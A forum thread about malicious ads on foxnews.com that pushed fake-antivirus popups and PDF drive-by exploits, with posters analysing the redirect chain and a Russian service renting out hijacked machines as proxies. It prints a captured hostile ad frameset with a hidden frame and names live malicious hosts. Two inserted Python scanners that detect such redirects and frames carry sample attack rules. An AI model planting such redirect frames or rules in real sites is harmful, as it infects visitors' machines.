JsMOM

@rr.com
reply to moonpuppy

Re: foxnews.com infected?

I unfortunately had to ask my entire company to stop visiting FOXNEWS. We will probably end up blacklisting it today via OpenDNS. FOXNEWS better make this a huge priority as I'm certain we are not the first, nor will be the last company to do so. Vundo, Bloodhound, etc. all have been blocked by Symantec AV, however others have crept in and Malwarebytes' AM was used in safe mode as well as Symantec AV to scrub the little PITAs out.

Infection seems to occur via FF and IE7. I'm not in the mood to install adblockers or noscript company wide.


evergreek
Boeing Rocks

join:2003-05-25
Hialeah, FL
reply to moonpuppy
I received the same pop up yesterday! Scanned my pc, everything seems ok.

Bobby_Peru
Premium
join:2003-06-16
reply to JsMOM

Re: foxnews.com infected?

said by JsMOM :

Infection seems to occur via FF and IE7. I'm not in the mood to install adblockers or noscript company wide.
Once upon a time, pre Adblock (in its actual block calling and downloading iteration), WebWasher had an application for central deployment that you might want to check out. Just a thought.


HowDoesItWork

@dhcp.inet.fi
reply to mysec
So how does this infection work and is it really such a big deal? How does it actually infect your system?

Doesn't it just exploit some vulnerabilities in the usual suspects (IE, Adobe Reader, Flash, Java etc.) or try to cheat the user to first click yes to the download prompt and then execute their scamware executable? If your software is patched and you have smarts enough to not click yes to everything, is this thing any threat at all? Or is this a problem just for that mass of people who run with unpatched IE under an admin account...

Thanks.

katarina2

join:2003-09-07
Houston, TX
said by HowDoesItWork :

If your software is patched and you have smarts enough to not click yes to everything, is this thing any threat at all?
Since many users are not aware of the fact that if they try to tell the pop-up "no thanks" by clicking on the usual "close" or "Cancel" buttons they see on their screen, they will probably get the download/install anyway ... I would think that it is a threat to even those with patched machines.

Not everyone knows to use Task Manager or other methods to get out of its grasp.

moonpuppy

join:2000-08-21
Glen Burnie, MD
reply to HowDoesItWork
said by HowDoesItWork :

So how does this infection work and is it really such a big deal? How does it actually infect your system?

Doesn't it just exploit some vulnerabilities in the usual suspects (IE, Adobe Reader, Flash, Java etc.) or try to cheat the user to first click yes to the download prompt and then execute their scamware executable? If your software is patched and you have smarts enough to not click yes to everything, is this thing any threat at all? Or is this a problem just for that mass of people who run with unpatched IE under an admin account...

Thanks.
I thought my system was fully patched.

I will say that I did NOT initiate any download and I NEVER click on pop-ups or any ads. In fact, IF I see something I like, I will manually copy the link and Google it first.


HowDoesItWork

@dhcp.inet.fi
reply to katarina2
quote:
Since many users are not aware of the fact that if they try to tell the pop-up "no thanks" by clicking on the usual "close" or "Cancel" buttons they see on their screen, they will probably get the download/install anyway ... I would think that it is a threat to even those with patched machines.

Not everyone knows to use Task Manager or other methods to get out of its grasp.
Shouldn't the browser still display a download dialog prompt, even if the popup is set to download anyway when you click on anything, including the no thanks button? Seems to me that it should, unless there's a serious flaw in the browser that makes it possible to download stuff without the user accepting the download. I mean, even if you click yes on the crapware popup, shouldn't there still be a download prompt from the browser, unless the browser is just insecure by design? Like this:

- you get served with the infected ad and popup
- you realize what's up and click on the X mark to close the popup
- the popup still tries to push the download on you
- your browser should alert you now that someone wants you to download something, and ask if you want to download the file, download and run it, or to just cancel the whole download

If it does work that way, then it's no threat to those who practice basic safe surfing. But I just don't know how this one works.

To moonpuppy, are you saying that you got infected by doing just browsing the site, not accepting any downloads, with a fully patched browser and fully patched plugins (flash, java, the usual)? If so, how does this thing do that? I'm confused.


MR Opus IT

@64.80.119.x
reply to moonpuppy
This is an FYI to all. After I cleaned my user's PC and upgraded to the newest version of Symantec Endpoint Protection, the only thing I did was open IE7, type www.foxnews.com, hit enter, and immediately Symantec caught 3 different malware files coming from the site. I didn't even have a chance to click. I am setting up another PC to test with to see if it was a combination of add-ons and IE7 or just IE7.

Cometcom1

join:2009-04-18
denmark
reply to HowDoesItWork
The actual infection is pretty nicely covered with the existing comments here, but how does this malware actually hide?

The advertising is loaded from the advertising servers, i.e. it might be hosted there or it might be external content that is injected in an iframe.

There are two ways that the fake av is initiated after this initial advertising loading.

Javascript redirect - done by hacking the server containing the ad and adding or modifying existing script files.

.htaccess redirect - done by hacking the server containing the ad and forcing a redirect based on the referrer, i.e. the ad can be displayed on multiple sites, but only if it is embedded in particular sites will it trigger a redirect. This is most often seen on search engine redirects.
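The referrer-gated .htaccess redirect described above, as an added example that is not part of Cometcom1's post or the thread: a small Python auditor a webmaster could run over a server's rewrite rules to surface redirects that only fire for visitors arriving from particular sites. The sample .htaccess and its hostnames are constructed placeholders.

```python
import re

# Constructed sample .htaccess (hypothetical hosts): a legitimate https-upgrade
# rule followed by an injected rule of the kind Cometcom1 describes, which only
# fires when the visitor arrived via particular publishers or search engines.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://%{HTTP_HOST}/$1 [R=301,L]
RewriteCond %{HTTP_REFERER} ^https?://([^/]+\\.)?(news-site\\.example|google\\.) [NC]
RewriteCond %{REQUEST_URI} !^/static/
RewriteRule ^(.*)$ http://redirector.example/?accs=1 [R=302,L]
"""

# mod_rewrite redirect flag in any of its spellings: [R], [R=302], [L,R=permanent]
_REDIRECT_FLAG = re.compile(r"[\[,]R(?:=\w+)?[,\]]")


def find_referrer_gated_redirects(htaccess, gated_vars=("REFERER",)):
    """Return RewriteRule redirects whose conditions test the visitor's Referer.

    mod_rewrite attaches RewriteCond lines to the next RewriteRule, so the
    scanner accumulates conditions and hands them to the rule that follows.
    Each finding carries the redirect target, its flags and the gating patterns.
    """
    findings, pending = [], []
    for raw in htaccess.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            pending.append((parts[1], parts[2]))   # (test variable, pattern)
        elif directive == "rewriterule" and len(parts) >= 3:
            target = parts[2]
            flags = parts[3] if len(parts) > 3 else ""
            gated = [pat for var, pat in pending
                     if any(v in var.upper() for v in gated_vars)]
            # an absolute URL target redirects even without an explicit R flag
            is_redirect = (target.startswith(("http://", "https://"))
                           or bool(_REDIRECT_FLAG.search(flags)))
            if gated and is_redirect:
                findings.append({"target": target, "flags": flags, "gated_on": gated})
            pending = []   # conditions are consumed by the rule they precede
    return findings
```

The same scanner can be pointed at other cloaking variables (for example a `("REFERER", "USER_AGENT")` tuple) since the gating check only looks at which variable each RewriteCond tests.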

amungus
Premium
join:2004-11-26
America
I am also interested in how it "hides" as well...

Last infection I got on one of my machines (first one in years), was likely due to an iframe. That, or the unlikely chance that an infected gmail "news ticker" (whatever it's called above the inbox - which I've disabled since then...) did it.

iframes have also been forbidden in noscript ever since that.

Agree with a post earlier - this is why I have zero qualms about using adblockplus, and especially noscript. Two of the best plugins IMHO.

Was shocked, however, to still get an infection with these two plugins......
iFrames have only been "forbidden" on the one machine I saw the infection on. On others, I've left noscript at its default settings for the most part.

MGD
Premium,MVM
join:2002-07-31
kudos:9

1 recommendation

reply to HowDoesItWork
said by HowDoesItWork :

... Shouldn't the browser still display a download dialog prompt, even if the popup is set to download anyway when you click on anything, including the no thanks button? Seems to me that it should, unless there's a serious flaw in the browser that makes it possible to download stuff without the user accepting the download. ...
Yes, for clarification, if you decline the scan, it will do the fake scan anyway and impose a full screen in your browser. If you then choose "cancel" for the recommended install, it will proceed with the download. The warning that the user will get is from their system alerting them to the dangers of allowing an .exe file to run. They should be able to use their system at that point to block the install. However, prior to that point, "cancel" and "no" mean "Yes".

Be aware that, as mysec points out, the initial popup redirect will also avail of the opportunity to look for several available exploits in the user's system configuration.

The IP 78.47.132.222 also contains a frame that sources from: >http://redirectclicks.com/?accs=845&tid=338

<html>
 <head>
  <title>Advertisement</title>
 </head>
 <frameset rows="1,*" cols="*">
  <frame src="http://78.47.132.222/a12/index2.php" name="topFrame" scrolling="no" noresize>
  <frame src="http://redirectclicks.com/?accs=845&tid=338" name="topFrame" scrilling="no" noresize>
 </frameset>
</html>


redirectclicks.com is associated with multiple malware:
»www.google.com/search?hl=en&q=%2···o.com%22

Redirectclicks.com is hosted once again on Hetzner Online AG (AS24940) at IP 88.198.69.115 [static.88-198-69-115.clients.your-server.de] alongside Traffic-go.com »www.google.com/search?hl=en&q=%2···G=Search

Both of those criminal domains have infected thousands of sites. While the current focus is on the exploitation of foxnews.com, this is a global problem that infects users everywhere:

Fox needs to quickly identify the responsible advertiser/s and remove and suspend them. You can find victim reports of infection attacks from Fox going back well over a month.

Incidentally, while wading through the cesspools of cyberspace following the trail of toppromooffer.com I bumped into our friend "Cactus" from Moscow. Small world!!

MGD
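As an added example that is not part of MGD's post or the thread, a Python scanner for the pattern in the frameset quoted above: a frame slot squeezed to 1 pixel by the frameset's rows, a frame sourcing from a different domain, and a bare-IP host. The sample HTML and its hosts are constructed placeholders, not the real ones from the post.

```python
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urlparse

# Constructed sample modelled on the two-frame advertisement page quoted in the
# thread; the hosts below are documentation placeholders, not the real ones.
SAMPLE_HTML = """<html>
 <head><title>Advertisement</title></head>
 <frameset rows="1,*" cols="*">
  <frame src="http://203.0.113.10/a12/index2.php" name="topFrame" scrolling="no" noresize>
  <frame src="http://redirector.example/?accs=845" name="topFrame" scrolling="no" noresize>
 </frameset>
 <body><iframe src="/ads/banner.html" width="1" height="1"></iframe></body>
</html>"""

class FrameCollector(HTMLParser):
    """Record every frame/iframe src and whether its slot is effectively invisible."""

    def __init__(self):
        super().__init__()
        self.frames = []
        self._rows = []   # rows= list of each open frameset
        self._index = []  # frames seen so far in each open frameset

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "frameset":
            self._rows.append([s.strip() for s in (a.get("rows") or "*").split(",")])
            self._index.append(0)
        elif tag in ("frame", "iframe"):
            # a 0/1 pixel width or height hides an iframe ...
            hidden = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            if tag == "frame" and self._rows:
                # ... and a 0/1 entry in the parent frameset's rows= hides a frame
                i, rows = self._index[-1], self._rows[-1]
                self._index[-1] += 1
                hidden = hidden or (i < len(rows) and rows[i] in ("0", "1"))
            self.frames.append({"tag": tag, "src": a.get("src") or "", "hidden": hidden})

    def handle_endtag(self, tag):
        if tag == "frameset" and self._rows:
            self._rows.pop()
            self._index.pop()

def suspicious_frames(html, page_host):
    """Flag frames that are hidden, point off-domain, or name a bare IP as host."""
    parser = FrameCollector()
    parser.feed(html)
    findings = []
    for f in parser.frames:
        explicit = urlparse(f["src"]).hostname   # None for a relative src
        host = explicit or page_host
        reasons = []
        if f["hidden"]:
            reasons.append("hidden")
        if host != page_host:
            reasons.append("off-domain")
        try:
            ip_address(explicit or "")           # only an explicit bare-IP src counts
            reasons.append("ip-literal")
        except ValueError:
            pass
        if reasons:
            findings.append({**f, "host": host, "reasons": reasons})
    return findings
```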

moonpuppy

join:2000-08-21
Glen Burnie, MD
reply to HowDoesItWork
said by HowDoesItWork :


To moonpuppy, are you saying that you got infected by doing just browsing the site, not accepting any downloads, with a fully patched browser and fully patched plugins (flash, java, the usual)? If so, how does this thing do that? I'm confused.
Fully patched OS, IE, Java, FLASH, etc. I saw multiple popups and I did not click no but the "X" of the window. When I realized what was happening, I immediately shut the laptop down HARD. I pressed the power button until it shut off completely and restarted the system with the wi-fi off. When I saw no activity, I turned the wi-fi back on and immediately headed here to do some cleaning and that's when I found the issues I mentioned earlier. I then posted here about it.

reply to moonpuppy
I'm curious. Not interested in knocking MS, but is this limited to windows? Any reports from mac or linux users? Thnx.


Dude111
An Awesome Dude
Premium
join:2003-08-04
USA
kudos:12
reply to moonpuppy
Well, if FOX knows about this and does nothing, they really do suck!!


HowDoesItWork

@dhcp.inet.fi
reply to MGD
quote:
Yes, for clarification, If you decline the scan, it will do the fake scan anyway and impose a full screen in your browser. If you then choose "cancel" for the recommended install, it will proceed with the download. The warning that the user will get is from their system alerting them to the dangers of allowing an .exe file to run. They should be able to use their system at that point to block the install. However, prior to that point, "cancel" and "no" means "Yes".
Now I feel a little stupid, but I still don't understand how it works. It's business as usual that the popup has a bogus cancel button and the X close window button, and it tries to make you download their crapware anyway. But unless the browser does something completely wrong, there should eventually be a download prompt and you should then be able to cancel the whole thing, so it can't infect your system. If this isn't the case with this particular crapware, I would sure like to know how it accomplishes this feat, technically. There are exploits, but unless it uses an unknown, unpatched zero day vulnerability, that shouldn't work against a fully patched browser and plugins...

quote:
Fully patched OS, IE, Java, FLASH, etc. I saw multiple popups and I did not click no but the "X" of the window. When I realized what was happening, I immediately shut the laptop down HARD. I pressed the power button until it shut off completely and restarted the system with the wi-fi off. When I saw no activity, I turned the wi-fi back on and immediately headed here to do some cleaning and that's when I found the issues I mentioned earlier. I then posted here about it.
So it could infect you without requiring any form of consent from the user? Now that is weird. For IE, I wouldn't be surprised, but if Firefox or Opera would do the same, that would be strange. I'm further confused because mysec on the previous page posted that with Opera, it does pop up a download prompt, and if you cancel the download, it can't infect you.

So, is there something in Opera that prevents this thing from insta-infection without any user consent that doesn't exist in IE or even Firefox? Hate to ask that many questions, but I don't understand the technique that this thing could possibly use to infect you instantly without you accepting a download, and then executing that download... aside from unpatched vulnerabilities. I wonder if the people infected by this were running as admin...

Carnivore

join:2003-01-06
reply to moonpuppy
I got this popup last night when I visited foxnews.com with IE8, and the fake virus scan began in a new window.

I forced the browser closed as quickly as I could with task manager, and ran a real scan with AVG 8.5 which appeared to be clean.

Does anyone know if AVG effectively detects this infection, and/or what other steps should be taken to ensure this thing didn't get its tentacles into my system?

moonpuppy

join:2000-08-21
Glen Burnie, MD
reply to HowDoesItWork
said by HowDoesItWork :


So it could infect you without requiring any form of consent from the user? Now that is weird. For IE, I wouldn't be surprised, but if Firefox or Opera would do the same, that would be strange. I'm further confused because mysec on the previous page posted that with Opera, it does pop up a download prompt, and if you cancel the download, it can't infect you.
Part of the infection can be done with PDF documents. Adobe even put out a warning that they wouldn't have a fix for a month.

mysec
Premium
join:2005-11-29
kudos:4

1 edit

1 recommendation

reply to HowDoesItWork
The fake antivirus exploit prompts for a download in IE, Opera, and Firefox because the download is an executable file for which these browsers prompt by default. I showed Opera in a previous post. Here are IE and Firefox:

The other exploits I found are automatically triggered (drive-by download):

IE exploits against the browser as I showed in the previous post.

PDF exploit in Firefox. This is from a previous exploit. Note that it is Acrobat calling out for the trojan and not Firefox:

Note that this is an Acrobat Reader exploit, not a browser exploit. The browser just loads the PDF file. This exploit works in all browsers. Be sure to configure your file types to "Prompt for Download" or "Always Ask".

Opera:

Firefox:

----
rich


Airborne29th

join:2008-10-20
Staunton, VA
Has this been cleaned? I've gone all through foxnews on our test computer to see if our antivirus will catch it, and nothing is coming up. Either that or it's silently being stopped; tried with Adblock Plus and without, IE and Firefox.


nojava

@acsalaska.net
reply to moonpuppy
Does this malware require java ? No Java = no infection?

bobince

join:2002-04-19
DE
reply to mysec

Re: foxnews.com infected?

quote:
Be sure and configure your file types to Prompt for Download, or "Always Ask"
You can also disable the plugin for all browsers from Reader's “Edit->Preferences->Internet->Display PDF in browser” option, or use a different PDF reader that doesn't install a plugin. (Who wants to read a PDF stuck inside a browser window anyway?)

As always, if you aren't using a plugin, remove it, and you'll reduce the attack surface of your browser and the number of things you have to worry about keeping updated. Do you really need PDF, Java, QuickTime and Real plugins? Probably not.


HowDoesItWork

@dhcp.inet.fi
reply to mysec
quote:
The fake antivirus exploit prompts for a download in IE, Opera, and Firefox because the download is an executable file for which these browsers prompt by default. I showed Opera in a previous post.
Ok, so there is a download prompt and you get a chance to cancel the whole thing, in those cases where it attempts to make you download an exe file instead of serving a browser or plugin exploit. That is good news.

quote:
The other exploits I found are automatically triggered (drive-by download):

IE exploits against the browser as I showed in the previous post.

PDF exploit in Firefox. This is from a previous exploit. Note that it is Acrobat calling out for the trojan and not Firefox:

Note that this is an Acrobat Reader exploit, not a browser exploit. The browser just loads the PDF file. This exploit works in all browsers. Be sure and configure your file types to Prompt for Download, or "Always Ask"
Ok, so the actual drive-by downloads (no user consent required) of this badware are based on exploits in either the browser or some other related program like PDF viewers, as usual. And the PDF exploits you can stop just by having the browser prompt for download of pdf files instead of opening them in the proper program, or even just by not giving the PDF viewer permission to go online when your firewall prompts for it. Good news, again!

Thanks for all the advice, guys, I think I understand how this thing operates now. If I got it right, this thing is not a threat as long as you
- have your browser set to prompt for download for exes, pdfs etc instead of having the browser run them at once, and cancel any suspicious, unwanted downloads, and
- have a fully patched browser that isn't vulnerable to the browser exploits this thing tries, such as the latest Opera version.

Or in other words, it's a pretty basic baddie. Sounds like I'm good to go, and have nothing to worry about this malware. It should be easy to avoid this thing: just keep the browser patched (and preferably use Opera) and have it set to prompt for downloading stuff, or disable all the pointless plugins we don't need like Adobe Reader etc.

Still, Foxnews should get their ads cleaned right the F now. It's inexcusable for a big outfit like that to serve crapware via ads. I wonder if a popup blocker would help against these things.


08034016
Hallo lisa Aus Amerika
Premium
join:2001-08-31
Byron, GA
reply to kpatz
said by kpatz:
Internet Explorer's add-on Shockwave Flash vs.3 found to be linking to the FormSpy website hosted at IP address 81.95.109.11. This add-on tries to send your private information to attackers' IP 72.95.109.11 (Malaysia)
quote:
IP address country: 81.95.109.11
IP address country flag Czech Republic
IP address state: Hlavni Mesto Praha
IP address city: Praha
quote:
IP address 72.95.109.11
IP country code: US
IP address country: flag United States
IP address state: Maine
IP address city: Orono
IP address latitude: 44.879101
IP address longitude: -68.733002
ISP of this IP [?]: Fairpoint Communications
Organization: Fairpoint Communications
--
Visit-
www.liveleak.com/view?i=e32_1231680425

MGD
Premium,MVM
join:2002-07-31
kudos:9
reply to mysec
said by mysec:

....
Note that this is an Acrobat Reader exploit, not a browser exploit. The browser just loads the PDF file. This exploit works in all browsers. Be sure and configure your file types to Prompt for Download, or "Always Ask"
..
----
rich
Great write-up!

I was particularly interested in this drive-by:

quote:
[Adobe Reader 6.0 from your computer wants to
connect to plathost.ru [78.109.25.217], port 80]

as that location has come to my attention on several occasions.

IP 78.109.25.217

appears to be hosting 3 domains: »whois.domaintools.com/78.109.25.217

1. Nevervhudo.ru »whois.domaintools.com/nevervhudo.ru

2. Socksps.ru »whois.domaintools.com/Socksps.ru

3. Stopgam.cn »whois.domaintools.com/Stopgam.cn

Due to the name, Socksps.ru aroused some curiosity, however, the main page only offers a log in:

If one can overcome that restriction an account holder can purchase the use of compromised machines around the globe to use as a secure proxy:

This may be where some of the compromised victim machines are leveraged for additional income:

The master list of available for rent machines is several pages long:

You can sort the available hijacked machines by country, and then buy access, daily or monthly to mask your true origin for any nefarious purpose:

USA:

UK:

Iran:

Note the banner ad for "carding Conference" at cashing.cc:

This may be where the compromised extracted financial data ends up for sale:

It appears that the only way to obtain a log in account in order to use the services of Socksps.ru is to contact ICQ 431278403

Or you can respond directly to his promotion on forum.zloy.org, a cyber criminals' one-stop shop for carding, hacking exploits, money transfers, banking etc.

His translated ad posting on forum.zloy.org for Socksps.ru services is here:

The main zloy.org page is translated here:

MGD


08034016
Hallo lisa Aus Amerika
Premium
join:2001-08-31
Byron, GA
reply to moonpuppy
Easy fix: block the site and disable downloading on your PC.

Now when I go to the site it gives me a red screen: Blocked by Administrator.
--
Visit-
www.liveleak.com/view?i=e32_1231680425


milvos

@123.211.89.x
reply to moonpuppy
I have been reading all this and maybe I am not great with viruses, adware, spyware etc.

I have been getting this pop-up with the fake virus scan for a few days now, and want to know whether it is something on my computer or whether this is coming from sites I am visiting. When I leave my computer idle for a while it seems to come up.

Any help appreciated.


FiOS Dan
Premium
join:2001-07-06
Boynton Beach, FL
reply to Sentinel
said by Sentinel:

...I use a hosts file to block ads as well.
Methinks that's the ticket.
--
Courage is being scared to death but saddling up anyway.